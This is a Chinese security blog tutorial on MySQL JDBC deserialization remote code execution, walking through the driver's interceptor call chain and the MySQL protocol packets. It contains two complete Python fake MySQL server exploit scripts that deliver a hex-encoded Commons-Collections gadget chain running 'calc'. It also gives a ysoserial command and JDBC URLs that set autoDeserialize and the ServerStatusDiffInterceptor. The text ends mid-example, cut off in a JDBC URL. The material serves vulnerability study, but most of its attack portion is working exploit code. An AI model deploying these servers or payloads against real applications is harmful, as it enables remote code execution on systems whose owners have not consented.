JDBC反序列化-MYSQL
前言
文章首发于:https://www.freebuf.com/articles/vuls/433153.html
已经好久没有写博客了,这段时间花了点时间学了点内网的知识,内网相关笔记后续可能会发了。这两天渗透的时候,进入到了一个若依系统中,发现有接口可以通过数据库连接源连接,想到了之前看过但是还没学习的JDBC反序列化的链子,今天学习一下。(要是之前就学了是不是这个就能打通了呢QwQ)
JDBC基础
这里简单说一下JDBC对数据库操作,包含以下几个步骤
- 导入包:要求导入包含数据库编程所需要的JDBC类软件包,通常来说
import java.sql.*就可以了
- 注册一个JDBC的驱动程序:要求初始化驱动程序,以便打开与数据库通信的通道
- 建立连接:需要使用
DirverManager.getConnect()方法创建一个connection对象,该对象表示数据库服务器的物理连接。需要创建新的数据库,在准备数据库URL时,无需提供任何数据库名称
- 执行查询:需要使用Statement类型对象来创建SQL语句并将其提交到数据库。
- 清理:需要显示关闭所有数据库资源,而不是依赖JVM的垃圾回收
这里我们来一个Demo来执行以上操作
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
| package com;
import java.sql.*;
public class JDBC {
static final String JDBC_DRIVER = "com.mysql.jdbc.Driver";
static final String DB_URL = "jdbc:mysql://localhost:3306/";
static final String USER = "root";
static final String PASS = "123456";
public static void main(String[] args) {
Connection conn = null;
Statement stmt = null;
try{
Class.forName(JDBC_DRIVER);
System.out.println("Connecting to database...");
conn = DriverManager.getConnection(DB_URL,USER,PASS);
System.out.println("Creating statement...");
stmt = conn.createStatement();
String sql = "CREATE DATABASE STUDENTS";
stmt.executeUpdate(sql);
System.out.println("Database created Successfully...");
} catch (ClassNotFoundException e) {
throw new RuntimeException(e);
} catch (SQLException e) {
throw new RuntimeException(e);
}
finally{
try{
if(stmt!=null){
stmt.close();
}
} catch (SQLException e) {
throw new RuntimeException(e);
}
try{
if(conn!=null){
conn.close();
}
} catch (SQLException e) {
throw new RuntimeException(e);
}
}
System.out.println("Bye");
}
}
|
这个JDBC反序列化,就是对MYSQL对服务器的请求的利用过程
其中MySQL客户端与服务器的完整交互过程大概如下图所示
JDBC反序列化漏洞
如果攻击者能控制JDBC连接设置项,那么就可以通过将其指向恶意Mysql服务器,进行ObjecInputStream.readObject()的反序列化攻击从而RCE
具体来说,在JDBC连接MySQL服务端时,会有几个内置的SQL查询语句要执行,其中两个查询你结果集在MySQL客户端被处理时,会调用ObjectInputStream.readObject()进行反序列化操作。如果攻击者搭建恶意MySQL服务器来控制这两个查询结果集,并且攻击者可以控制JDBC连接设置项,那么就能触发MySQL JDBC反序列化漏洞
以下是两个可以利用的查询语句:
- SHOW SESSION STATUS
- SHOW COLLATION
环境搭建
pom.xml导入依赖如下
1
2
3
4
5
6
7
8
9
10
| <dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>8.0.13</version>
</dependency>
|
漏洞分析
CC链子作为命令执行的部分,这里我们就需要去找一个JDBC合理的入口类,并且这个入口类要在JDBC连接过程中被自动执行,最终找到com.mysql.cj.jdbc.result.ResultSetImpl,他的getObject()方法调用了readObject方法
JDBC通过MySQL数据库查询数据会返回一个结果集,将查询到结果返回给程序并将结果封装ResultSetImpl这个类 中
所以这个类不满足用户可控输入这一点,因此我们要去找哪里调用了ResultSetImpl#getObject(),最终找到ResultSetUtil类的resultSetToMap方法调用了ResultSetImpl#getObject(),并且能够继续向上去寻找调用
ResultSetUtil这个类是用来处理一些测试用例的结果,或者是profiler的结果。简而言之就是用来数据处理的类,我们继续往上看,谁调用了这里
我们在ServerStatusDiffInterceptor类的populateMapWithSessionStatusValues方法调用了ResultSetUtil#resultSetToMap
这里看一下populateMapWithSessionStatusValues方法的代码逻辑,首先建立了JDBC的连接,并创建查询SHOW SESSION STATUS,接着调用ResultSetUtil#resultSetToMap,完成查询并封装查询结果
我们这里向上查找调用,找到了两个地方:ServerStatusDiffInterceptor#postProcess和ServerStatusDiffInterceptor#preProcess
ServerStatusDiffInterceptor是一个拦截器,在JDBC URL中设定属性queryInterceptors为ServerStatusDiffInterceptor时,执行查询语句会调用拦截器的preProcess和postProcess方法,这是一个自动化执行的过程,可以利用它作为利用链的头部
数据包分析
我们现构造一个JDBC的客户端,代码如下
1
2
3
4
5
6
7
8
9
10
11
12
13
| package com;
import java.sql.*;
public class Test {
public static void main(String[] args) throws Exception {
Class.forName("com.mysql.jdbc.Driver");
String jdbc_url = "jdbc:mysql://127.0.0.1:3306/jdbc?characterEncoding=UTF-8&serverTimezone=Asia/Shanghai" +
"&autoDeserialize=true" +
"&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
Connection con = DriverManager.getConnection(jdbc_url, "jdbc", "123456");
}
}
|
在本地开一个mysql服务,配置数据库信息后运行,使用wireshark进行抓包,并使用以下过滤语句过滤3306端口的mysql协议(这里实际使用不同IP进行实验更好)
1
| tcp.port == 3306 && mysql
|
这里我们需要构造的是greeting、Response OK和Response数据包,这些数据包都可以直接照抄,按流量包将MySQL Protocol中的数据直接返回到客户端,但除了SHOW SESSION STATUS的返回包需要我们自己构造,其中我们的序列化数据就存储在其中
如下图,这个是一个Response OK的数据包,我们选中MySQL Protocol部分,他的数据流为0700000200000002000000,因此我们发送数据时只需要发送0700000200000002000000
fakeMySQL构造
部分代码构造
除去SHOW SESSION STATUS的返回包以外,其他数据包构造的如下代码所示,可以先将其他部分的数据包构造搞清楚后,再进行SHOW SESSION STATUS数据包的构造
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
| import binascii
import socket
greeting = "4a0000000a352e372e323600130000005623364e2121182c00fff7c00200ff811500000000000000000000594b096a7d56547301550952006d7973716c5f6e61746976655f70617373776f726400"
responseOK = "0700000200000002000000"
def send_data(conn, data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiving the package : {}".format(data))
return str(data).lower()
def run():
while True:
conn, addr = sk.accept()
send_data(conn, greeting)
while True:
receive_data(conn)
send_data(conn, responseOK)
data = receive_data(conn)
if "session.auto_increment_increment" in data:
payload = "01000001142e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c21000c000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c21002d000000fd00001f00002a0000080364656600000014636f6c6c6174696f6e5f636f6e6e656374696f6e000c21002d000000fd00001f000022000009036465660000000c696e69745f636f6e6e656374000c21002a000000fd00001f00002900000a0364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000b03646566000000076c6963656e7365000c210009000000fd00001f00002c00000c03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000d03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000e03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f73697a65000c3f001500000008a00000000026000010036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000011036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000012036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000013036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001403646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000015036465660000000c776169745f74696d656f7574000c3f001500000008a00000000019010016013104757466380475746638047574663804757466380f757466385f756e69636f64655f63690f757466385f67656e6572616c5f63690e534554204e414d45532075746638033132300347504c01310831363737373231360236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce40653595354454d0f52455045415441424c452d524541440331323007000017fe000002000200"
send_data(conn,payload)
data = receive_data(conn)
if "show warnings" in data:
payload = "01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000"
send_data(conn,payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, responseOK)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, responseOK)
data = receive_data(conn)
if "@@session.autocommit" in data:
payload = "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000002000003013107000004fe000002000000"
send_data(conn,payload)
if "SHOW SESSION STATUS" in data:
pass
break
if __name__ == "__main__":
HOST = "0.0.0.0"
PORT = 3306
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST,PORT))
sk.listen(1)
print("start fake mysql server listening on {}:{}".format(HOST, PORT))
run()
|
SHOW SESSION STATUS响应包编写
想要自行去编写该响应包,需要对MySQL的私有协议有一些了解
从流量中看,SHOW SESSION STATUS属于request query报文,对于查询数据包的响应包分为以下四种:
- 错误包(ERR Packet)
- 正确包(OK Packet)
- Protocol::LOCAL_INFILE_Request
- 结果集(ProtocolText::Resultset)
在这一部分中,我们返回的是结果集这类型的响应包,该类响应包结构如下图所示
结果集结构可以说分为五个数据段
- 数据段1:说明下面的结果集有多少列
- 数据段2:列的定义
- 数据段3:EOF包
- 数据段4:行数据
- 数据段5:EOF包
数据段的结构也是相似的。 长度(3字节) 序号(1字节) 协议数据(不同协议,数据不同)
- 数据段1就可以写成
01 00 00 01 02,前三字节表示数据长度为1,sequence id为1,最后一字节02表示有两列(这里说写成一列的化无法正常运行)
- 数据段2的定义比较复杂,我们直接那完整的数据进行分析
1a000002036465660001630163016301630c3f00ffff0000fcffff000000
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| 1a 00 00 //3字节表示长度(这个长度说的是协议的内容长度,不包括序号那一字节)
02 //序号 因为是第二个数据字段
03646566 // 这个就是def的意思。
00 //schema 协议因为不使用就用00
01 63 //table 因为我们使用列数据,就不需要名字了,下面几个都是任意字符。字符串第一字节是用来说明长度的。
01 63 //org_table 01表示1字节,63是数据
0163 //name
0163 //org_name
0c filler // length of the following fields 总是0x0c
3f00 //characterset 字符编码 003f是binary
ffff0000 column_length //允许数据最大长度,就是我们行数据的最大长度。ffff
fc //column_type 这一列数据类型 fc表示blob
9000 //flags 9000用的官方的 poc可以运行。 看fnmsd的要大于128好像。
00 //decimals
0000 //filler_2
|
- 我见过的POC中都没有添加EOF包,不知道为什么加上就无法复现成功
- 数据段4就是POC了,POC其实和上面一样的。计算出长度(3字节)序号(1字节)行数据(行数据第一个字节是数据的长度)
- 最后加入一个EOF包
这里我们使用ysoserial生成CC的POC
1
| java -jar ysoserial [CCn] "calc" > payload
|
最终POC
大佬们的POC中,show warnings的返回包构造出现了两次,一次是在session.auto_increment_increment的else if后,一次是在SHOW SESSION STATUS的后面
尝试了一下,在SHOW SESSION STATUS的后面,会继续发送一个show warnings的request query包,只有当返回该包的响应包,才能执行反序列化操作
前面的else if (show warnings)我没加,但是可以成功执行,求大佬们解答一下前面的else if判断是有哪种特殊情况吗
大佬们的POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
| import socket
import binascii
import os
greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()
def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def get_payload_content():
file= r'a'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")
else:
print("open false")
payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878'
return payload_content
def run():
while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))
send_data(conn,greeting_data)
while True:
receive_data(conn)
send_data(conn,response_ok_data)
data=receive_data(conn)
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
payload_content=get_payload_content()
payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break
if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3309
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)
print("start fake mysql server listening on {}:{}".format(HOST,PORT))
run()
|
自写POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
| import binascii
import os
import socket
greeting = "4a0000000a352e372e323600130000005623364e2121182c00fff7c00200ff811500000000000000000000594b096a7d56547301550952006d7973716c5f6e61746976655f70617373776f726400"
responseOK = "0700000200000002000000"
def send_data(conn, data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiving the package : {}".format(data))
return str(data).lower()
def get_payload_content():
file= r'payload'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")
else:
print("open false")
payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878'
return payload_content
def run():
while True:
conn, addr = sk.accept()
send_data(conn, greeting)
while True:
receive_data(conn)
send_data(conn, responseOK)
data = receive_data(conn)
if "session.auto_increment_increment" in data:
payload = "01000001142e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c21000c000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c21002d000000fd00001f00002a0000080364656600000014636f6c6c6174696f6e5f636f6e6e656374696f6e000c21002d000000fd00001f000022000009036465660000000c696e69745f636f6e6e656374000c21002a000000fd00001f00002900000a0364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000b03646566000000076c6963656e7365000c210009000000fd00001f00002c00000c03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000d03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000e03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f73697a65000c3f001500000008a00000000026000010036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000011036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000012036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000013036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001403646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000015036465660000000c776169745f74696d656f7574000c3f001500000008a00000000019010016013104757466380475746638047574663804757466380f757466385f756e69636f64655f63690f757466385f67656e6572616c5f63690e534554204e414d45532075746638033132300347504c01310831363737373231360236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce40653595354454d0f52455045415441424c452d524541440331323007000017fe000002000200"
send_data(conn,payload)
data = receive_data(conn)
if "show warnings" in data:
payload = "01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000"
send_data(conn,payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, responseOK)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, responseOK)
data = receive_data(conn)
if "@@session.autocommit" in data:
payload = "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000002000003013107000004fe000002000000"
send_data(conn,payload)
data = receive_data(conn)
if "show session status" in data:
mysqlData = "0100000102"
mysqlData += "1a000002036465660001630163016301630c3f00ffff0000fc9000000000"
mysqlData += "1a000002036465660001630163016301630c3f00ffff0000fc9000000000"
payload_content = get_payload_content()
payload_length = str(hex(len(payload_content) // 2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
data_len = str(hex(len(payload_content) // 2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysqlData += data_len_hex + '04' + 'fbfc' + payload_length_hex
mysqlData += str(payload_content)
mysqlData += '07000005fe000022000100'
send_data(conn, mysqlData)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break
if __name__ == "__main__":
HOST = "0.0.0.0"
PORT = 3306
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST,PORT))
sk.listen(1)
print("start fake mysql server listening on {}:{}".format(HOST, PORT))
run()
|
调试分析
在ServerStatusDiffInterceptor#populateMapWithSessionStatusValues方法处下一个断点,进行分析调式
在ServerStatusDiffInterceptor#populateMapWithSessionStatusValues调用ResultSetUtil#resultSetToMap前,会发送SHOW SESSION STATUS数据包。就是在这里发送数据包时,如果没有show warings数据包的响应包返回,就不会走到下一步。
跟进ResultSetUtil#resultSetToMap方法内,漏洞的触发点是在第二个rs#getObject方法中,第一个rs#getObject返回的是NULL,我们跟进分析
进入后,会判断字段是否为二进制类型和BLOB类型,如果符合条件的话,就会从MySQL服务器中获取对应的字节码数据。在第三标记部分中,通过判断头部信息-84 19,十六进制对应也就是AC ED,判断它是否为Java的序列化数据。还会判断 autoDeserialize 是否为 true。
这里进入rs#getObject方法后,一步一步跟进后,最后走到objIn.readObject()反序列化触发点,这里可以看到数据流部分的开头,是-84 -19典型的java序列化数据的头部特征,也就是AC ED
执行反序列化的过程中,就会触发反序列化漏洞
不同 MySQL-JDBC-Driver 的 payload
8.x
如该文章demo处
1
2
3
| "jdbc:mysql://127.0.0.1:3309/test?characterEncoding=UTF-8&serverTimezone=Asia/Shanghai" +
"&autoDeserialize=true" +
